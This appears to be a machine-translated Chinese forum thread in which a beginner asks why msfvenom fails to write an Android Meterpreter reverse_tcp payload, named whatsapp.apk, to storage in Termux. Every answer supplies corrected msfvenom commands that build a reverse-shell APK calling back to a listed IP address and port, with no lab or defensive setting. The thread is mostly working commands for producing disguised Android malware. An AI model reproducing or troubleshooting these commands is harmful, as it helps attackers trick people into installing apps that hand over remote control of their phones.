在termux中创建metasploit有效负载

时间:2019-04-28 04:12:03

标签: termux

我正在尝试在我的Android手机上使用termux创建metasploit有效负载。我是初学者。我正在执行以下命令

msf > ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=56.37.60.149 LPORT=4444 R> /storage/whatsapp.apk

(由于我没有sdcard,因此我正在将STORAGE编写为destinaion来保存APK文件。我已经在termux中检查了设置,允许存储权限。)

我遇到以下错误:

  

[*]执行:ruby msfvenom -p android / meterpreter / reverse_tcp   LHOST = 56.37.60.149 LPORT = 4444 R> /storage/whatsapp.apk

     

sh:1:无法创建/storage/whatsapp.apk:权限被拒绝

4 个答案:

答案 0 :(得分:0)

此错误是由于没有超级用户(根)权限而不是存储/WhatsApp.apk引起的。

您必须了解Linux文件系统才能了解权限...您可以使用这些命令来完成您想做的事情...

首先...要授予termux访问您的内部存储空间...您必须使用termux-setup-storage并允许访问Android 7+上的文件

下一步... 运行此修改后的命令。

msf > ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=56.37.60.149 LPORT=4444 R> /sdcard/whatsapp.apk

答案 1 :(得分:0)

如果您已经在termux上安装了metasploit框架,则可以使用以下命令:

cd #HOME
msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=<PORT> -a dalvik --platform android R > storage/downloads/name.apk

答案 2 :(得分:0)

尝试

msfvenom -p android/meterpreter/reverse_tcp LHOST=56.37.60.149 LPORT=4444 -a dalvik --platform android R > ~/storage/shared/Unkn0wn.apk

msfvenom -p android/meterpreter/reverse_tcp LHOST=56.37.60.149 LPORT=4444 -a dalvik --platform android R > /storage/emulated/0/Unkn0wn.apk

msfvenom -p android/meterpreter/reverse_tcp LHOST=56.37.60.149 LPORT=4444 -a dalvik --platform android R > /sdcard/Unkn0wn.apk

答案 3 :(得分:0)

这是因为您不需要红宝石。试试这个:

msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT=5555 (Name file whatever you want).apk